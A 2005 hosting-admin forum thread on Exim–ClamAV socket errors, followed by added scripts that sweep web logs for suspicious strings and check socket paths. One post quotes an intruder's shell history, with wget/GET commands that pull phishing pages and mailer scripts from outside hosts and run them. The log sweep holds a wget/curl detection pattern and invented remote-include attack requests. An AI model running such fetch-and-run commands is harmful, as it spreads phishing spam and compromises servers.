Exim / ClamAV(Connecter) issues

Discussion in 'General Discussion' started by stdout, Jul 13, 2005.

  1. stdout

    stdout Well-Known Member

    Joined:
    Apr 10, 2003
    Messages:
    189
    Likes Received:
    5
    Trophy Points:
    18
    Location:
    Nelspruit, Mpumalanga, South Africa
    cPanel Access Level:
    Root Administrator
    Hello, I need some input over here.

    I have installed clamavconnector 0.86.1-1.0, and now get a load of clam errors.
    This is the second server that I am seeing this on today. I had simply removed ClamAV altogether on the previous server. I don't want to have to do the same with this one. What choices do I have? I have uninstalled clamavconnector and I am still seeing this error.
    eximup --force, cupup --force both yield nothing.

    Am I the only one who was stupid enough to try this addon module on 2 different servers? Has anyone else experienced this?

    -
    root@moon [~]# tail /var/log/exim_paniclog
    2005-07-13 22:06:44 1DsoRI-0007hz-9f malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:06:44 1DsoRI-0007i0-Cv malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:06:46 1DsoRK-0007i1-6S malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:06:47 1DsoRL-0007i5-Or malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:06:49 1DsoRN-0007i6-63 malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:06:53 1DsoRR-0007iA-C9 malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:06:53 1DsoRR-0007i9-Ba malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:06:56 1DsoRT-0007iG-LL malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:07:01 1DsoRZ-0007iL-CM malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:07:01 1DsoRZ-0007iM-Bt malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    root@moon [~]# ls -l /var/run/clamav/clamd
    srwxrwxrwx 1 root root 0 Jun 26 01:52 /var/run/clamav/clamd=
    root@moon [~]# date
    Wed Jul 13 22:07:16 BST 2005
    root@moon [~]# service exim restart
    Shutting down clamd: [ OK ]
    Shutting down exim: [ OK ]
    Shutting down antirelayd: [ OK ]
    Shutting down spamd: [ OK ]
    Starting clamd: [ OK ]
    Starting exim-26: [ OK ]
    Starting exim: [ OK ]
    Starting exim-smtps: [ OK ]
    Starting antirelayd: [ OK ]
    Starting spamd: Could not create INET socket on 127.0.0.1:783: Address already in use (IO::Socket::INET: Address already in use)
    [FAILED]
    root@moon [~]# tail -n 5 /var/log/exim_paniclog
    2005-07-13 22:08:10 1DsoSf-0007my-Vj malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:08:11 1DsoSg-0007mu-JB malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:08:29 1DsoSz-0007rY-7K malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:08:29 1DsoSz-0007rY-Li malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:08:30 1DsoT0-0007rU-Ok malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    root@moon [~]#
    -

    What are your thoughts?
     
  2. stdout

    I have disabled ClamAV on both servers now. Luckily I had only applied this on 2 of our servers. Please respond with any fixes, patches or ideas that I could attempt.
     
  3. noimad1

    noimad1 Well-Known Member

    Joined:
    Mar 27, 2003
    Messages:
    627
    Likes Received:
    0
    Trophy Points:
    16
    I'm seeing the same problem on one of our servers, but don't know why either... what did you do to disable?
     
  4. Snowman30

    Snowman30 Well-Known Member
    PartnerNOC

    Joined:
    Apr 7, 2002
    Messages:
    681
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    DataCenter Provider
    I've just noticed an issue with Clam on our servers.

    Despite it being enabled and configured for all users in the clients' cPanels it returns:
    I've removed and re-installed cPanel Pro and clamavconnector but still no joy.

    Running WHM 10.3.1 cPanel 10.4.0-C150

    Anyone have any ideas?
     
  5. stdout

    Someone had told me to upgrade to Edge, which I ended up doing - Do NOT do this.

    It did fix the problem, but had broken Fantastico as the newest Edge release is now changing permissions to httpd.conf/mysql configurations..

    I had the same issues with other servers. It was a matter of playing with cPanel's scripts...
    I remember removing clamd on a few servers altogether as the downtime was just unacceptable. It did not make a good week.. Remove Pro as there is/was a CWD.so issue.

    restartsrv_clamd works, if you're receiving connection refused in your paniclog...
    A reinstall > addon modules > clamavconnector/pro would be recommended as well..

    P.S. Has anyone else been seeing this automated spam script sending "enviar.txt"? It has targeted 3 servers so far. What script is it targeting, as the victims have numerous scripts in their homedirs which I just don't have the time to go through.. I am guessing it is automated as I am seeing identical filenames across servers.
     
  6. stdout

    Just a quick update:
    I guess it isn't an automated script.

    -
    php -q enviar.txt "Mundo das mensagens" mundodasmensagens@ig "Uma linda mensagem para voce Meu amor" lista10.txt index.html
    history
    php -q enviar.txt "Mundo das mensagens" mundodasmensagens@ig "Uma linda mensagem para voce Meu amor" lista11.txt index.html
    history
    php -q enviar.txt "Mundo das mensagens" mundodasmensagens@ig "Uma linda mensagem para voce Meu amor" lista12.txt index.html
    history
    php -q enviar.txt "Mundo das mensagens" mundodasmensagens@ig "Uma linda mensagem para voce Meu amor" lista23.txt index.html
    echo firmanet1@yahoo.ca > mail.txt;wget lnxr0x.hpgvip.ig.com.br/phan.txt;wget lnxr0x.hpgvip.ig.com.br/enviar.txt;mv phan.txt index.html;php -q enviar.txt "Cartes YAHOO" cartoes@yahoo.com.br "Parabns, Voc recebeu um carto YAHOO" mail.txt index.html
    echo firmanet1@yahoo.ca > mail.txt;wget lnxr0x.hpgvip.ig.com.br/phan.txt;wget lnxr0x.hpgvip.ig.com.br/enviar.txt;mv phan.txt index.html;php -q enviar.txt "Cartes YAHOO" cartoes@yahoo.com.br "Parabns, Voc recebeu um carto YAHOO" mail.txt index.html
    php -q enviar.txt "Cartes YAHOO" cartoes@yahoo.com.br "Parabns, Voc recebeu um carto YAHOO" email13.txt index.html
    php -q enviar.txt "Cartes YAHOO" cartoes@yahoo.com.br "Parabns, Voc recebeu um carto YAHOO" lista13.txt index.html
    ps x
    cd /var/tmp;rm -rf p;mkdir p;cd p;echo firmanet1@yahoo.ca > mail.txt
    cd /dev/shm
    ls
    echo firmanet1@yahoo.ca > mail.txt
    wget
    GET lnxr0x.hpgvip.ig.com.br/phan.txt > phan.txt
    GET lnxr0x.hpgvip.ig.com.br/enviar.txt > enviar.txt
    mv phan.txt index.html;php -q enviar.txt "Cartes YAHOO" cartoes@yahoo.com.br "Parabns, Voc recebeu um carto YAHOO" mail.txt index.html
    GET http://geocities.yahoo.com.br/phantasma_25/email10.txt
    GET http://geocities.yahoo.com.br/phantasma_25/email10.txt > email10.txt
    GET http://geocities.yahoo.com.br/phantasma_25/email1.txt > email1.txt
    GET http://br.share.geocities.com/phantasma_25/email46.txt > email46.txt
    GET http://lordlovelife.com/nomes-br.txt
    ls
    wget
    GET http://lordlovelife.com/nomes-br.txt > nomes-br.txt
    ls
    GET http://lordlovelife.com/a.txt > a.txt
    perl a.txt hotmail.com
    ls
    cat list* > mail.txt
    rm list*
    ls
    php -q
    -

    Any thoughts?
     
  7. PanelGuy

    PanelGuy Well-Known Member

    Joined:
    Oct 13, 2004
    Messages:
    106
    Likes Received:
    0
    Trophy Points:
    16
    Brazilian Crew

    That is from a Brazilian hacking crew that also targeted the University of Stanford and MS.

    Know this: it reports weaknesses to an IRC channel, so I am sure you have a lot more stuff creeping around. Check /tmp etc. The whole thing begins with some web based chats, etc.
     
  8. stdout

    Re

    If you're having this problem, try replacing the clamd socket path from "/var/run/clamav/clamd" to "/var/clamd"
    av_scanner = clamd:/var/run/clamav/clamd
    av_scanner = clamd:/var/clamd

    There are quite a few new PHP/XSS based worms floating around. Since my last post I've set up a cronjob to tail -n 1000 /etc/httpd/domlogs/* and to grep for various tmp/wget/curl strings - it works wonders, I suggest others do the same to keep an eye on things.
     
  9. PanelGuy

    Are you doing this hourly, or?...

    Thank you.
     
    #9 PanelGuy, Nov 10, 2005
    Last edited: Nov 11, 2005
  10. Zaf

    Zaf Well-Known Member

    Joined:
    Aug 22, 2005
    Messages:
    119
    Likes Received:
    0
    Trophy Points:
    16
    Probably this is the command:
    Code:
    tail -n 1000 /etc/httpd/domlogs/* | grep -E 'tmp|wget|curl'
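The sweep stdout describes in post 8 and the one-liner Zaf gives above, written out as a small script. This is an added example and not code from the thread or from cPanel: it tails the last N lines of every per-domain Apache log under a directory and reports requests whose URL carries the fetch-and-stage strings the thread names (wget, curl, /tmp, /dev/shm), raw or URL-encoded. Every log line in it is constructed for the demo; /etc/httpd/domlogs is the cPanel log directory named in post 8.

```shell
#!/bin/sh
# Added example, not code from the thread: a domlog sweep in the spirit of the
# cron job in post 8 and Zaf's one-liner. It tails the last N lines of every
# per-domain Apache log under a directory and reports requests whose URL
# carries fetch-and-stage strings (wget, curl, /tmp, /dev/shm), raw or
# URL-encoded. All log lines below are constructed for the demo.

# Case-insensitive pattern; (/|%2f) covers both "/" and its URL-encoded form.
SUSPECT_RE='wget|curl|(/|%2f)tmp|(/|%2f)dev(/|%2f)shm'

# scan_domlogs DIR [N]: print "<logname>: <line>" for each suspicious request
# among the last N lines (default 1000) of each log in DIR.
scan_domlogs() {
    dir="$1"; n="${2:-1000}"
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        tail -n "$n" "$f" | grep -E -i "$SUSPECT_RE" | sed "s|^|$(basename "$f"): |"
    done
    return 0   # a clean sweep (grep found nothing) is not an error
}

# count_suspect DIR [N]: number of hits, the value a cron alert would key on.
count_suspect() {
    scan_domlogs "$1" "$2" | wc -l | tr -d ' '
}

# make_sample_logs DIR: write two constructed domlogs in combined log format.
# Two of the five requests carry the strings we look for; the rest are normal.
make_sample_logs() {
    mkdir -p "$1"
    cat > "$1/example.com" <<'EOF'
192.0.2.10 - - [13/Jul/2005:22:06:44 +0100] "GET /index.php?page=http://198.51.100.7/x.txt?&c=cd%20/tmp;wget%20198.51.100.7/y.txt HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.0.2.11 - - [13/Jul/2005:22:07:01 +0100] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.12 - - [13/Jul/2005:22:07:05 +0100] "GET /gallery.php?id=3 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
EOF
    cat > "$1/example.net" <<'EOF'
203.0.113.5 - - [13/Jul/2005:22:08:10 +0100] "GET /forum.php?inc=http://203.0.113.9/e.txt?&c=curl%20-o%20%2Fdev%2Fshm%2Fp HTTP/1.1" 200 256 "-" "libwww-perl/5.803"
203.0.113.6 - - [13/Jul/2005:22:08:29 +0100] "POST /contact.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
EOF
}

# Demo against a throwaway directory; a real run would point at /etc/httpd/domlogs.
demo_dir=$(mktemp -d)
make_sample_logs "$demo_dir"
scan_domlogs "$demo_dir"
echo "suspicious requests: $(count_suspect "$demo_dir")"
rm -rf "$demo_dir"
```

Run from cron as `scan_domlogs /etc/httpd/domlogs 1000` and alert when `count_suspect` is non-zero. Tailing only the last lines keeps each run cheap, at the cost of missing a burst that scrolls past between runs; shorten the interval or raise N accordingly. The pattern is deliberately loose, so expect some false positives from legitimate URLs that happen to contain these words, and treat a hit as something to read, not as proof of compromise.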
     
  11. PanelGuy

    Mine is set to av_scanner = clamd:/usr/sbin/clamd because that is where clamd is for some reason.

    And I am riddled with spamd and clamd connection refused or permission denied errors, no matter what I do.

    Is the point of your change - that I should be aiming at the clamd.pid file?
     
    #11 PanelGuy, Nov 12, 2005
    Last edited: Nov 12, 2005
  12. stdout

    Strange path.
    Comment out the line, or make a backup of your current exim.conf

    Try using one of the following and then tail your /var/log/exim_paniclog.
    av_scanner = clamd:/var/run/clamav/clamd
    av_scanner = clamd:/var/clamd
     
  13. PanelGuy

    Ok, read edit above too.

    Also, note in my clamd.conf, how should these two be set?
    LocalSocket /var/run/clamav/clamd
    PidFile /var/run/clamd.pid

    I have made the clamav directory just for the log and made it chown -R mail:mail with clamav in the mail group.

    I originally had the .pid file there, but changed it, as you can see above.
     
  14. PanelGuy

    clamd issue remains

    Result:
    /var/clamd (No such file or directory)
    /var/clamav/clamd (No such file or directory)

    If I change everything back, then pay very close attention to permissions, I get it to start up fine, but then it says:

    WARNING: Socket file /var/run/clamav exists. Unclean shutdown? Removing...
    ERROR: Socket file /var/run/clamav could not be removed: Permission denied

    Is it expecting the file name or the directory, in clamd.conf, for LocalSocket?
     
    #14 PanelGuy, Nov 12, 2005
    Last edited: Nov 12, 2005
  15. stdout

    Leave clamd.conf untouched

    exim.conf:
    av_scanner = clamd:/var/run/clamav

    /scripts/restartsrv_clamd; check your exim_paniclog, no clam errors should be reported.

    also tail your /var/log/clamd.log (if configured); this file gets quite large, you may need to echo > clamd.log if the logfile size has been exceeded.

    If you're still having problems, log into your WHM, Addon Modules - uninstall/install ClamAV Connector.
     
  16. stdout

    It's the clamd socket file, not the executable or the pid file.
     
  17. PanelGuy

    If i set it to what you wrote it says it's not there, if I set it back to /usr/sbin/clamd it starts but then:
    Clamd.log says:
    WARNING: Socket file /var/run/clamav exists. Unclean shutdown? Removing...
    ERROR: Socket file /var/run/clamav could not be removed: Permission denied

    I have removed and reinstalled through WHM several times, also removed cPanel Pro as that was also suggested.

    Removed and reinstalled separately and at the same time.

    I'm hoping you can help.
     
  18. PanelGuy

    Ok, I changed the clamd.conf so that it points to the LocalSocket as a file, and the result was semi-good. The only thing I get now is:

    ERROR: Socket file /var/run/clamav/clamd.sock could not be bound: Permission denied

    Which is still bad but moving forward.
     
    #18 PanelGuy, Nov 12, 2005
    Last edited: Nov 12, 2005
  19. PanelGuy

    .pid troubles

    OK, I am down to this one last issue; otherwise, I successfully have clamd running.

    ERROR: Can't save PID in file /var/run/clamd.pid

    How do I fix that news? There are plenty of other working .pid files there, so it shouldn't be a permissions issue.
     
  20. PanelGuy

    clamd .pid and .sock

    Ok, the solution was simple. I made one directory for the .pid then chown clamav:clamav and a separate directory for the .sock then chown mail:mail.

    All works!

    Now I need to work on spamd which seems to be a more complex problem.

    Yes, these problems were inherited.
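The back-and-forth from post 8 onward comes down to one question: does the path exim hands to clamd (av_scanner) match the path clamd actually listens on (LocalSocket), and is there a socket file there? Below is an added consistency check for exactly that, not code from the thread or from cPanel. It reads both settings, compares them, and classifies what sits at the path, including the failure from posts 14 and 17 where LocalSocket named the directory /var/run/clamav instead of a socket file inside it. The two config excerpts it writes for the demo are constructed; the paths in them are the ones the thread names, and /etc/clamd.conf and /etc/exim.conf in the usage note are assumed locations.

```shell
#!/bin/sh
# Added example, not code from the thread: check that exim's av_scanner and
# clamd's LocalSocket agree, and report what is actually at that path. The
# config excerpts written by make_sample_configs are constructed for the demo.

# conf_value FILE KEY: value of the first "KEY value" line (clamd.conf style).
conf_value() {
    awk -v key="$2" '$1 == key { print $2; exit }' "$1"
}

# exim_av_socket FILE: the path after "clamd:" in the av_scanner line.
exim_av_socket() {
    sed -n 's/^[[:space:]]*av_scanner[[:space:]]*=[[:space:]]*clamd:[[:space:]]*\([^[:space:]]*\).*/\1/p' "$1" | head -n 1
}

# check_clamd_socket CLAMD_CONF EXIM_CONF: prints one verdict word:
#   unconfigured  one of the two settings is absent
#   is_dir        LocalSocket names an existing directory; clamd cannot bind it
#                 (the "Socket file /var/run/clamav exists" case in the thread)
#   mismatch      exim and clamd name different paths; every scan will fail
#                 with "unable to connect to UNIX socket"
#   missing       paths agree but no socket exists there yet (clamd down, or it
#                 could not bind for permission reasons)
#   ok            paths agree and a Unix socket is present
check_clamd_socket() {
    local_sock=$(conf_value "$1" LocalSocket)
    exim_sock=$(exim_av_socket "$2")
    if [ -z "$local_sock" ] || [ -z "$exim_sock" ]; then echo unconfigured; return 0; fi
    if [ -d "$local_sock" ]; then echo is_dir; return 0; fi
    if [ "$local_sock" != "$exim_sock" ]; then echo mismatch; return 0; fi
    if [ -S "$local_sock" ]; then echo ok; else echo missing; fi
}

# make_sample_configs DIR LOCALSOCKET AVPATH: write constructed excerpts of
# clamd.conf and exim.conf into DIR using the given socket paths.
make_sample_configs() {
    mkdir -p "$1"
    printf '# constructed clamd.conf excerpt\nLogFile /var/log/clamd.log\nLocalSocket %s\nPidFile /var/run/clamd.pid\n' "$2" > "$1/clamd.conf"
    printf '# constructed exim.conf excerpt\nav_scanner = clamd:%s\n' "$3" > "$1/exim.conf"
}

# Demo: clamd on /var/run/clamav/clamd while exim is told /var/clamd, the kind
# of disagreement the thread's av_scanner edits were trying to resolve.
demo=$(mktemp -d)
make_sample_configs "$demo" /var/run/clamav/clamd /var/clamd
echo "disagreeing configs: $(check_clamd_socket "$demo/clamd.conf" "$demo/exim.conf")"
rm -rf "$demo"
```

Against a live box, run `check_clamd_socket /etc/clamd.conf /etc/exim.conf` (assumed locations) after `/scripts/restartsrv_clamd`; anything other than `ok` explains the paniclog before you start editing either file. The check deliberately stops at the socket: the PidFile and socket-directory ownership problems PanelGuy hit in posts 18 to 20 are a separate question of which user clamd runs as and who owns the parent directories, which this script does not inspect.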
     